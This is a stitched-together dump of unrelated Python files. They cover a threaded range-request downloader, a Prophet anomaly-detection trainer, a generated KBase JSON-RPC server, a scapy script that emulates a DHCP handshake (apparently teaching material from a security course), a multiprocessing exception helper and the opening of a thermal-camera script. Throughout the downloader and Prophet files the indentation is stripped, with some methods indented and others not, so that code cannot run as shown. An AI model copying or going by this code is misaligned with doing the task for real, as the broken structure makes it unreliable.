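#     class Worker(StoppableThread):
#         def run(self):
#             while not self.stopped():
#                 do_one_unit_of_work()   # placeholder for real work
#
#     w = Worker()
#     w.start()
#     w.stop()    # request shutdown
#     w.join()    # returns once run() notices the stop flag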
class Download():
"""
Class for downloading content from the web more than the speed of light! (jk)
"""
def __init__(self, url, filename="Default",path="/Downloads"):
self._cores = psutil.cpu_count()
self.url = url
self.saveas = filename
self.path = path
def get_cores(self):
"""
Function to return the number of cores.
"""
return self._cores
    def _download_chunk(self, headers, start):
        # pass the Range header as a keyword argument; passed positionally,
        # requests would treat it as query params rather than headers
        obj = requests.get(self.url, headers=headers, stream=True)
        # "r+b" (unlike "ab+") honours seek(), so each worker writes its byte
        # range at the correct offset; download() pre-creates the file
        with open(self.saveas, "r+b") as f:
            f.seek(start)
            f.write(obj.content)
def download(self,s_thread = False):
"""
Method for downloading the given content.
"""
response_obj = requests.head(self.url)
if 'content-length' not in response_obj.headers.keys():
raise ValueError('Invalid URL.')
file_size = int(response_obj.headers['content-length'])
self._file_size = file_size
if file_size == 0:
raise ValueError('Download Error: File Size is 0kB, either the file is too small or the URL is invalid.')
        path = os.path.expanduser('~') + self.path
        os.chdir(path)
        # pre-create (and truncate) the target file so every worker can open it in "r+b"
        open(self.saveas, "wb").close()
        # Single thread
        if s_thread:
            headers = {'Range': 'bytes=%d-%d' % (0, file_size)}
            self._download_chunk(headers, 0)
            return
# multi-thread
chunk = file_size // self._cores
self._chunksize = chunk
for i in range(self._cores):
start = chunk*i
end = start + chunk
if i == self._cores-1:
end = file_size
# print(start,end)
headers = {'Range': 'bytes=%d-%d' % (start, end)}
            thread = threading.Thread(target=self._download_chunk, args=(headers, start))
            thread.daemon = True
            thread.start()
main = threading.current_thread()
for t in threading.enumerate():
if t is main:
continue
t.join()
    def get_chunk_size(self):
        return self._chunksize
    def get_filesize(self):
        return self._file_size
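# Hedged usage sketch (the URL is a placeholder, not from the original code):
# Download writes into ~/Downloads by default and splits the transfer into one
# byte-range request per CPU core.
#
#     d = Download("https://example.com/big-file.bin", filename="big-file.bin")
#     d.download()               # multi-threaded range download
#     d.download(s_thread=True)  # or a single full-range request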
|
prophet_model.py
|
from pandas import DataFrame, Series
from fbprophet import Prophet
import random
import numpy as np
from itertools import product
import pandas as pd
import threading
import datetime
from multiprocessing import cpu_count
from functions import *
from utils import *
from logger import LoggerProcess
def get_anomaly(fact, yhat_upper, yhat_lower):
ad = Series([0, 0])
if fact > yhat_upper:
ad = Series([1, abs((fact - yhat_upper) / fact)])
if fact < yhat_lower:
ad = Series([1, abs((yhat_lower - fact)/ fact)])
return ad
def get_anomaly_score(anomaly, fact, yhat_upper, yhat_lower):
if anomaly == 1:
return abs((fact - yhat_upper) / fact)
if anomaly == -1:
return abs((yhat_lower - fact)/ fact)
def get_tuning_params(parameter_tuning, params, job):
arrays = []
for p in params:
if p not in list(parameter_tuning.keys()):
arrays.append([params[p]])
else:
arrays.append(
np.arange(float(parameter_tuning[p].split("*")[0]),
float(parameter_tuning[p].split("*")[1]),
float(parameter_tuning[p].split("*")[0])).tolist()
)
comb_arrays = list(product(*arrays))
if job != 'parameter_tuning':
return random.sample(comb_arrays, int(len(comb_arrays)*0.5))
else:
return comb_arrays
def get_params(params, comb):
count = 0
for p in params:
_p = type(params[p])(comb[count])
params[p] = _p
count += 1
return params
def mean_absolute_percentage_error(y_true, y_pred):
y_true, y_pred = np.array(y_true), np.array(y_pred)
return np.mean(np.abs((y_true - y_pred) / y_true)) * 100
class TrainProphet:
def __init__(self,
job=None, groups=None, time_indicator=None, feature=None,
data_source=None, data_query_path=None, time_period=None):
self.job = job
self.params = hyper_conf('prophet')
self.combination_params = hyper_conf('prophet_cp')
self.hyper_params = hyper_conf('prophet_pt')
self.optimized_parameters = {}
self._p = None
self.levels_tuning = get_tuning_params(self.hyper_params, self.params, self.job)
self.query_date = get_query_date(job, period=time_period, dates=None, params=self.params)
self.data, self.groups = data_manipulation(job=job,
date=self.query_date,
time_indicator=time_indicator,
feature=feature,
data_source=data_source,
groups=groups,
data_query_path=data_query_path)
self.date = time_indicator
self.f_w_data = self.data
self.split_date = get_split_date(period=time_period, dates=list(self.data[self.date]), params=self.params)
self.feature = feature
self.anomaly = []
self.model = None
self.count = 1
self.levels = get_levels(self.data, self.groups)
self.logger = LoggerProcess(job=job,
model='prophet',
total_process=len(self.levels)
if job != 'parameter_tuning' else len(self.levels_tuning))
self.comb = None
self.prediction = None
def get_query(self):
count = 0
query = ''
for c in self.comb:
if type(c) != str:
query += self.groups[count] + ' == ' + str(c) + ' and '
else:
query += self.groups[count] + " == '" + str(c) + "' and "
count += 1
query = query[:-4]
return query
def get_related_params(self):
self._p = self.params if self.combination_params is None else self.combination_params[self.get_param_key()]
def convert_date_feature_column_for_prophet(self):
renaming = {self.date: 'ds', self.feature: 'y'}
self.f_w_data = self.f_w_data.rename(columns=renaming)
self.f_w_data['ds'] = self.f_w_data['ds'].apply(lambda x: datetime.datetime.strptime(str(x)[0:19], '%Y-%m-%d %H:%M:%S'))
return self.f_w_data
def fit_predict_model(self, save_model=True):
self.f_w_data = self.convert_date_feature_column_for_prophet()
self.model = Prophet(daily_seasonality=False, yearly_seasonality=False, weekly_seasonality=False,
seasonality_mode='multiplicative',
interval_width=float(self._p['interval_width']),
changepoint_range=float(self._p['changepoint_range']),
n_changepoints=int(self._p['n_changepoints'])
).fit(self.f_w_data[['ds', 'y']])
if save_model:
model_from_to_pkl(directory=conf('model_main_path'),
path=model_path(self.comb, self.groups, 'prophet'),
model=self.model, is_writing=True)
def detect_anomalies(self):
self.model = model_from_to_pkl(directory=conf('model_main_path'),
path=model_path(self.comb, self.groups, 'prophet'))
try:
self.prediction = self.model.predict(self.convert_date_feature_column_for_prophet())
self.f_w_data = pd.merge(self.f_w_data,
self.prediction.rename(columns={'ds': self.date}),
on=self.date,
how='left')
self.f_w_data = self.f_w_data[self.f_w_data[self.date] >= self.split_date]
self.f_w_data[['ad_label_3', 'anomaly_score_3']] = self.f_w_data.apply(lambda row:
get_anomaly(row[self.feature],
row['yhat_upper'],
row['yhat_lower']), axis=1)
self.anomaly += self.f_w_data[['ad_label_3', self.date, 'anomaly_score_3'] + self.groups].to_dict("results")
print(self.f_w_data[['ad_label_3', self.date, 'anomaly_score_3'] + self.groups])
except Exception as e:
print(e)
def train_execute(self):
if not hyper_conf('prophet_has_param_tuning_first_run'):
self.parameter_tuning()
for self.comb in self.levels:
print("*" * 4, "PROPHET - ", self.get_query().replace(" and ", "; ").replace(" == ", " - "), "*" * 4)
self.f_w_data = self.data.query(self.get_query()).sort_values(by=self.date)
print("data size :", len(self.f_w_data))
self.convert_date_feature_column_for_prophet()
self.get_related_params()
self.fit_predict_model()
self.logger.counter()
if not check_request_stoped(self.job):
break
def prediction_execute(self):
for self.comb in self.levels:
print("*" * 4, "PROPHET - ", self.get_query().replace(" and ", "; ").replace(" == ", " - "), "*" * 4)
if check_model_exists(model_path(self.comb, self.groups, 'prophet'), conf('model_main_path')):
self.f_w_data = self.data.query(self.get_query()).sort_values(by=self.date)
print("prediction size :", len(self.f_w_data))
self.detect_anomalies()
self.logger.counter()
if not check_request_stoped(self.job):
break
self.anomaly = DataFrame(self.anomaly)
def process_execute(self, pr, count):
self.get_related_params()
self._p = get_params(self._p, pr)
print("hyper parameters : ", self._p)
self.convert_date_feature_column_for_prophet()
self.fit_predict_model(save_model=False)
self.prediction = self.model.predict(self.convert_date_feature_column_for_prophet())
error[count] = mean_absolute_percentage_error(self.f_w_data['y'], abs(self.prediction['yhat']))
def parameter_tuning_threading(self, has_comb=True):
global error
error = {}
_optimized_parameters = None
err = 100000000
self.f_w_data = self.data.query(self.get_query()).sort_values(by=self.date) if has_comb else self.f_w_data
self.f_w_data = self.f_w_data[-int(0.1 * len(self.f_w_data)):]
for iter in range(int(len(self.levels_tuning) / cpu_count())):
_levels = self.levels_tuning[(iter * cpu_count()):((iter + 1) * cpu_count())]
            threads = []
            for i in range(len(_levels)):
                self.logger.counter()
                threads.append(threading.Thread(target=self.process_execute, daemon=True,
                                                args=(_levels[i], i,)))
                threads[-1].start()
            # join only after the whole batch has been started so it actually runs in parallel
            for worker in threads:
                worker.join()
for i in error:
if i in list(error.keys()):
if error[i] < err:
err = error[i]
_optimized_parameters = get_params(self.params, _levels[i])
return _optimized_parameters
def get_param_key(self):
return "_".join([str(i[0]) + "*" + str(i[1]) for i in zip(self.groups, self.comb)])
def parameter_tuning(self):
if len(self.levels) == 0:
self.optimized_parameters = self.parameter_tuning_threading(has_comb=False)
else:
for self.comb in self.levels:
self.optimized_parameters[self.get_param_key()] = self.parameter_tuning_threading()
if not check_request_stoped(self.job):
break
print("updating model parameters")
pt_config = read_yaml(conf('docs_main_path'), 'parameter_tunning.yaml')
pt_config['has_param_tuning_first_run']['prophet'] = True
_key = 'hyper_parameters' if len(self.levels) == 0 else 'combination_params'
pt_config[_key]['prophet'] = self.optimized_parameters
write_yaml(conf('docs_main_path'), "parameter_tunning.yaml", pt_config, ignoring_aliases=True)
self.params = hyper_conf('prophet')
self.combination_params = hyper_conf('prophet_cp')
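# Hedged usage sketch (assumes the configuration helpers pulled in by the
# wildcard imports - hyper_conf(), conf(), data_manipulation() - are already
# set up; the argument values below are illustrative only):
#
#     model = TrainProphet(job='train', groups='store', time_indicator='date',
#                          feature='sales', data_source='csv',
#                          data_query_path='data.csv', time_period='day')
#     model.train_execute()        # fits and pickles one Prophet model per level
#     model.prediction_execute()   # fills model.anomaly with labelled rows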
|
kbdeleonContigFilterServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kbdeleonContigFilter.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kbdeleonContigFilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kbdeleonContigFilter.kbdeleonContigFilterImpl import kbdeleonContigFilter # noqa @IgnorePep8
impl_kbdeleonContigFilter = kbdeleonContigFilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kbdeleonContigFilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kbdeleonContigFilter.run_kbdeleonContigFilter,
name='kbdeleonContigFilter.run_kbdeleonContigFilter',
types=[dict])
self.method_authentication['kbdeleonContigFilter.run_kbdeleonContigFilter'] = 'required' # noqa
self.rpc_service.add(impl_kbdeleonContigFilter.run_kbdeleonContigFilter_max,
name='kbdeleonContigFilter.run_kbdeleonContigFilter_max',
types=[dict])
self.method_authentication['kbdeleonContigFilter.run_kbdeleonContigFilter_max'] = 'required' # noqa
self.rpc_service.add(impl_kbdeleonContigFilter.status,
name='kbdeleonContigFilter.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kbdeleonContigFilter ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
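# Hedged usage sketch (for local testing only, not part of the generated
# server): start the service on an OS-assigned port in a child process so it
# can be stopped programmatically, as described in the start_server docstring.
#
#     port = start_server(host='localhost', port=0, newprocess=True)
#     # ... issue JSON-RPC POST requests against http://localhost:<port> ...
#     stop_server()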
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
DHCP_FULL.py
|
#!/usr/bin/python3.4
# -*- coding=utf-8 -*-
# This script was written by the current "Mingjiao leader" of Qianyitang for the Qianyidun Python course!
# Instructor QQ: 605658506
# Qianyitang official site: www.qytang.com
# Qianyidun is a comprehensive security course developed by the current "Mingjiao leader" of Qianyitang,
# covering traditional network security (firewalls, IPS...) together with Python and penetration testing!
import sys
sys.path.append('/usr/local/lib/python3.4/dist-packages/PyQYT/ExtentionPackages')
sys.path.append('/usr/lib/python3.4/site-packages/PyQYT/ExtentionPackages')
sys.path.append('../../ExtentionPackages')
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)#清除报错
from scapy.all import *
import multiprocessing
import struct
from PyQYT.Network.Tools.Change_MAC_To_Bytes import Change_MAC_To_Bytes
from PyQYT.Network.Tools.GET_MAC import GET_MAC
from PyQYT.Network.Tools.Change_Chaddr_To_MAC import Change_Chaddr_To_MAC
from DHCP_Discover import DHCP_Discover_Sendonly
from DHCP_Request import DHCP_Request_Sendonly
def DHCP_Monitor_Control(pkt):
try:
        if pkt.getlayer(DHCP).fields['options'][0][1] == 1:  # detect and print DHCP Discover
            print('Found DHCP Discover packet, MAC address: ', end='')
MAC_Bytes = pkt.getlayer(BOOTP).fields['chaddr']
MAC_ADDR = Change_Chaddr_To_MAC(MAC_Bytes)
print(MAC_ADDR)
            print('Options found in the Discover packet:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
        elif pkt.getlayer(DHCP).fields['options'][0][1] == 2:  # detect and print DHCP Offer
            options = {}
            MAC_Bytes = pkt.getlayer(BOOTP).fields['chaddr']
            MAC_ADDR = Change_Chaddr_To_MAC(MAC_Bytes)
            # read the details from the Offer and store them in the options dict
            options['MAC'] = MAC_ADDR
            options['client_id'] = Change_MAC_To_Bytes(MAC_ADDR)
            print('Found DHCP Offer packet, the requester was offered IP: ' + pkt.getlayer(BOOTP).fields['yiaddr'])
            print('Options found in the Offer packet:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
options['requested_addr'] = pkt.getlayer(BOOTP).fields['yiaddr']
for i in pkt.getlayer(DHCP).fields['options']:
if i[0] == 'server_id' :
options['Server_IP'] = i[1]
Send_Request = multiprocessing.Process(target=DHCP_Request_Sendonly, args=(Global_IF,options))
Send_Request.start()
        elif pkt.getlayer(DHCP).fields['options'][0][1] == 3:  # detect and print DHCP Request
            print('Found DHCP Request packet, requested IP: ' + pkt.getlayer(BOOTP).fields['yiaddr'])
            print('Options found in the Request packet:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
        elif pkt.getlayer(DHCP).fields['options'][0][1] == 5:  # detect and print DHCP ACK
            print('Found DHCP ACK packet, acknowledged IP: ' + pkt.getlayer(BOOTP).fields['yiaddr'])
            print('Options found in the ACK packet:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
except Exception as e:
print(e)
pass
def DHCP_FULL(ifname, MAC, timeout = 10):
global Global_IF
Global_IF = ifname
Send_Discover = multiprocessing.Process(target=DHCP_Discover_Sendonly, args=(Global_IF,MAC))
Send_Discover.start()
sniff(prn=DHCP_Monitor_Control, filter="port 68 and port 67", store=0, iface=Global_IF, timeout = timeout)
if __name__ == '__main__':
ifname = 'eno33554944'
DHCP_FULL('eno33554944', GET_MAC(ifname))
|
MultiprocessingWithException.py
|
import multiprocessing as mp
import traceback
from typing import Optional, Tuple
class ProcessWithException(mp.Process):
"""
to be treated same as usual multiprocessing process, with
p = Process(target=target, args=args)
p.start()
p.join()
p.print_and_raise_if_has_exception()
extended from stack overflow https://stackoverflow.com/a/33599967/11837276
"""
_exception: Optional[Tuple[Exception, str]]
def __init__(self, *args, **kwargs):
mp.Process.__init__(self, *args, **kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
def run(self):
try:
mp.Process.run(self)
self._cconn.send(None)
except Exception as e:
tb = traceback.format_exc()
self._cconn.send((e, tb))
# raise e # You can still rise this exception if you need to
@property
    def exception(self) -> Optional[Tuple[Exception, str]]:
if self._pconn.poll():
self._exception = self._pconn.recv()
return self._exception
def print_and_raise_if_has_exception(self):
if self.exception is None:
return
print("=" * 30 + "\n")
print("=" * 30 + "\n")
print("=" * 30 + "\n")
print(self.exception[1])
raise self.exception[0]
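# Minimal, hedged usage sketch (the failing worker below is hypothetical and
# exists only to show how the child's traceback is surfaced in the parent):
def _example_failing_worker():
    raise RuntimeError("boom")

if __name__ == "__main__":
    p = ProcessWithException(target=_example_failing_worker)
    p.start()
    p.join()
    # prints the child's formatted traceback, then re-raises the exception here
    p.print_and_raise_if_has_exception()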
|
main.py
|
import asyncio
import math
import sys
import time
import pdb
from multiprocessing import Process, Queue
import numpy as np
import serial
import adafruit_mlx90640
import board
import busio
import main
from file_utils import create_folder_if_absent, save_npy
from visualizer import init_heatmap, update_heatmap
from centroid_history import displacement_history
from socket import *
from struct import pack
import json
# load config
import os
import sys
curr_dir = os.path.dirname(os.path.realpath(__file__))
config_dir = os.path.join(curr_dir, "config.json")
with open(config_dir, "r") as readfile:
global config
config = json.loads(readfile.read())
BAUD_RATE = 115200
ARRAY_SHAPE = (24, 32)
